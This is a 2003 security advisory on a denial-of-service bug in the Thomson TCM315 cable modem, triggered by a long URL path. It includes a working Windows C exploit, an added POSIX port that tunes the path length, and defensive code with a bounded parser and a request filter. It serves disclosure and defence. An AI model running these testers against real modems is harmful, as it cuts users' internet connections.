___________________________________________________________________________
. : Shell Security Advisory : .
Subject: Buffer overflow in the cable modem Thomson TCM315
Issue date: 2003 November 23
Related link: http://www.shellsec.net/leer_advisory.php?id=2
Homepage: http://www.shellsec.net
Info about product: http://www.qb.ro/docs/tcm315.pdf
___________________________________________________________________________
[ - 1 - Introduction ]
----------------------------
Software description:
Thomson TCM315 cable modem
- DOCSIS 1.0 certified
- DOCSIS 2.0 ready and DOCSIS 1.1 compliant
- NAT/PAT/Firewall and integrated router for SOHO installations (in a
separate software release)
- Bridging between the USB and Ethernet port
- Easy Access to Advanced Diagnostics Web Pages
- USB port for easy installation
- Reliable high-performance platform
- Surf the Internet Up to 100 Times Faster than a 56k analog Modem
- Internet On-Off button for enhanced security
[ - 2 - Problem description ]
----------------------------------------
The problem is triggered by sending the cable modem's built-in web server an
HTTP request whose request target (the URL path) is a long string; the modem
stops responding and resets, a denial of service (DoS). A path of 100 'A'
characters is enough in our tests. Example (the request line is wrapped here
with a backslash; it is sent as a single line):
GET /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1
or, from a browser:
http://<cablemodem.IP>/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[ - 3 - How to exploit it ]
----------------------------------
To test this vulnerability we used the following code. Note: the code is
written in C for Windows systems (Winsock), but it is easily portable to
Unix systems.
--------------------- CUT HERE ---------------------
/*
ADVISORY - Thomson Cablemodem TCM315 Denial of Service
Shell security group (2003) http://www.shellsec.net
10 November 2003
Tested against: TCM315 MP
Software Version: ST31.04.00
Software Model: A801
Bootloader: 2.1.4c
Impact: users with access to the network can remotely shut down the
internet connection.
Discovered by: aT4r Andres[at]shellsec.net
Vendor: contacted (no answer)
Fix: not yet
usage: thdos.exe 192.168.100.1
*/
/* Build on Windows with: cl thdos.c ws2_32.lib */
#include <stdio.h>
#include <string.h>
#include <winsock2.h>

int main(int argc, char *argv[]) {
    char evil[150], buffer[1000];
    struct sockaddr_in shellsec;
    SOCKET fd;
    WSADATA ws;

    if (argc != 2) {
        printf("usage: thdos.exe <cablemodem.IP>\n");
        return 1;
    }
    WSAStartup(MAKEWORD(1, 1), &ws);
    shellsec.sin_family = AF_INET;
    shellsec.sin_port = htons(80);                 /* the modem's web server */
    shellsec.sin_addr.s_addr = inet_addr(argv[1]);

    /* request target of 100 'A' characters: enough to reset the modem */
    memset(evil, '\0', sizeof(evil));
    memset(evil, 'A', 100);
    sprintf(buffer, "GET /%s HTTP/1.1\r\n\r\n\r\n", evil);

    fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (connect(fd, (struct sockaddr *)&shellsec, sizeof(shellsec)) != SOCKET_ERROR) {
        send(fd, buffer, (int)strlen(buffer), 0);
        printf("done. Thomson Cablemodem reset!\n");
        Sleep(100);   /* Win32 Sleep() in milliseconds; let the modem read the request */
    } else {
        printf("Unable to connect to CM.\n");
    }
    closesocket(fd);
    WSACleanup();
    return 0;
}
--------------------- CUT HERE ---------------------
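The advisory says the tester is easily portable to Unix. The following is an added example, not code from the original advisory or from Shell Security: a POSIX (BSD sockets) version that also takes the request-target length as an argument, so a tester can find the smallest length that resets a given firmware instead of only trying 100 bytes. The function names build_request and send_probe, the 4096-byte request buffer and the default length of 100 are this example's own choices; port 80 and the path of 'A' characters come from the advisory.

```c
/* POSIX port of the TCM315 tester (added example, not the advisory's code).
 * usage: ./thdos <cablemodem.IP> [path_length]   (path_length defaults to 100) */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>

/* Build "GET /AAA... HTTP/1.1\r\n\r\n" with path_len 'A' characters in out.
 * Returns the request length, or -1 if it would not fit (never overflows out). */
int build_request(char *out, size_t outsz, size_t path_len) {
    const char *head = "GET /";
    const char *tail = " HTTP/1.1\r\n\r\n";
    size_t need = strlen(head) + path_len + strlen(tail);
    if (need + 1 > outsz)
        return -1;
    memcpy(out, head, strlen(head));
    memset(out + strlen(head), 'A', path_len);
    memcpy(out + strlen(head) + path_len, tail, strlen(tail) + 1); /* copies the NUL too */
    return (int)need;
}

/* Connect to ip:80 and send len bytes of req. Returns 0 on success, -1 on error. */
int send_probe(const char *ip, const char *req, size_t len) {
    struct sockaddr_in cm;
    int fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (fd < 0)
        return -1;
    memset(&cm, 0, sizeof(cm));
    cm.sin_family = AF_INET;
    cm.sin_port = htons(80);
    if (inet_pton(AF_INET, ip, &cm.sin_addr) != 1 ||
        connect(fd, (struct sockaddr *)&cm, sizeof(cm)) < 0) {
        close(fd);
        return -1;
    }
    ssize_t n = send(fd, req, len, 0);
    close(fd);
    return (n == (ssize_t)len) ? 0 : -1;
}

int main(int argc, char *argv[]) {
    char req[4096];
    size_t path_len = 100;                  /* the length used in the advisory */
    if (argc < 2) {
        fprintf(stderr, "usage: %s <cablemodem.IP> [path_length]\n", argv[0]);
        return 1;
    }
    if (argc > 2)
        path_len = (size_t)strtoul(argv[2], NULL, 10);
    int len = build_request(req, sizeof(req), path_len);
    if (len < 0) {
        fprintf(stderr, "path_length %zu does not fit the request buffer\n", path_len);
        return 1;
    }
    if (send_probe(argv[1], req, (size_t)len) != 0) {
        fprintf(stderr, "Unable to connect to CM.\n");
        return 1;
    }
    printf("sent %d-byte request with a %zu-byte path; check whether the modem resets\n",
           len, path_len);
    return 0;
}
```

Run it once per candidate length (for example 50, 75, 100) and watch whether the modem's web interface stops answering; the smallest length that does so is the figure worth reporting to the vendor.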
[ - 4 - Solution ]
-----------------------
Thomson was notified of this vulnerability but did not answer, so as far as
we know there is no patch for this issue. As a workaround, filter requests
made to the cable modem's web interface so that only trusted hosts can reach
it.
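The advisory names the bug class (buffer overflow on a long request target, section 2) and the workaround (filtering requests to the modem, section 4) without showing either. The following is an added example and not the TCM315 firmware, which is not public: an unbounded target copy of the kind that produces this failure, beside a bounded parser that answers 414 instead of overflowing, and a filter rule built on the same check that a host or proxy in front of the modem could apply. The 64-byte TARGET_MAX, the 512-byte request-line limit, the path "/index.htm" and the function names are this example's assumptions; the 100-character path of 'A's is the advisory's.

```c
/* Added example, not the TCM315 firmware: the unbounded copy that turns a long
 * request target into memory corruption, beside the bounded parse that rejects
 * it, and a filter rule built on the same check. */
#include <stdio.h>
#include <string.h>

#define TARGET_MAX 64   /* assumed capacity of the server's path buffer */

/* Constructed attack request: "GET /" plus 100 'A's, as in the advisory. */
#define A10 "AAAAAAAAAA"
static const char ATTACK_REQUEST[] =
    "GET /" A10 A10 A10 A10 A10 A10 A10 A10 A10 A10 " HTTP/1.1\r\n\r\n";

/* Vulnerable pattern: copy the target up to the first space with no bound.
 * Returns the bytes written (terminator included) so the caller can compare
 * against TARGET_MAX; it is only ever called here with a 4096-byte scratch
 * buffer, so the example itself never overflows anything. */
static size_t copy_target_unbounded(const char *line, char *out) {
    const char *p = line + 4;          /* skip "GET " */
    size_t n = 0;
    while (*p && *p != ' ')
        out[n++] = *p++;
    out[n] = '\0';
    return n + 1;
}

/* Hardened parse: returns 0 and fills out with the target, or the HTTP status
 * the server should answer with: 400 for a malformed request line, 414 when
 * the target does not fit in out (never truncate silently, never overflow). */
static int parse_request_line(const char *line, char *out, size_t outsz) {
    if (strncmp(line, "GET ", 4) != 0)
        return 400;
    const char *start = line + 4;
    const char *end = strchr(start, ' ');
    if (end == NULL || *start != '/')
        return 400;
    size_t len = (size_t)(end - start);
    if (len >= outsz)
        return 414;
    memcpy(out, start, len);
    out[len] = '\0';
    return 0;
}

/* Filter for a host or proxy placed in front of the modem: forward only
 * requests whose first line parses into a target that fits TARGET_MAX.
 * Returns 1 to allow, 0 to drop. */
static int filter_allow(const char *raw) {
    char line[512], target[TARGET_MAX];
    const char *eol = strstr(raw, "\r\n");
    size_t n = eol ? (size_t)(eol - raw) : strlen(raw);
    if (n >= sizeof(line))
        return 0;                      /* whole request line oversized: drop */
    memcpy(line, raw, n);
    line[n] = '\0';
    return parse_request_line(line, target, sizeof(target)) == 0;
}

int main(void) {
    char scratch[4096], target[TARGET_MAX];
    size_t written = copy_target_unbounded(ATTACK_REQUEST, scratch);
    printf("unbounded copy writes %zu bytes into a %d-byte buffer (%zu past the end)\n",
           written, TARGET_MAX, written - TARGET_MAX);
    printf("bounded parse of attack line -> %d\n",
           parse_request_line(ATTACK_REQUEST, target, sizeof(target)));
    printf("bounded parse of normal line -> %d (%s)\n",
           parse_request_line("GET /index.htm HTTP/1.1", target, sizeof(target)), target);
    printf("filter: normal=%d attack=%d\n",
           filter_allow("GET / HTTP/1.1\r\n\r\n"), filter_allow(ATTACK_REQUEST));
    return 0;
}
```

The 414 path is the point: a parser that knows its buffer size has a place to fail closed, whereas the unbounded loop has none and writes 38 bytes past a 64-byte buffer for the advisory's 100-character path. The same check, applied upstream in filter_allow, drops the request before it reaches a device that cannot be patched.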
[ - 5 - Credits ]
---------------------
Author: Andrés Tarascó ( andres[at]shellsec.net )
Editor: Fernando Ortega ( fernando[at]shellsec.net )
Issue date: 23 November 2003
Url: http://www.shellsec.net
_______________________________________________________
Shell Security administrator (admin[at]shellsec.net)
Shell Security Group (http://www.shellsec.net)
_______________________________________________________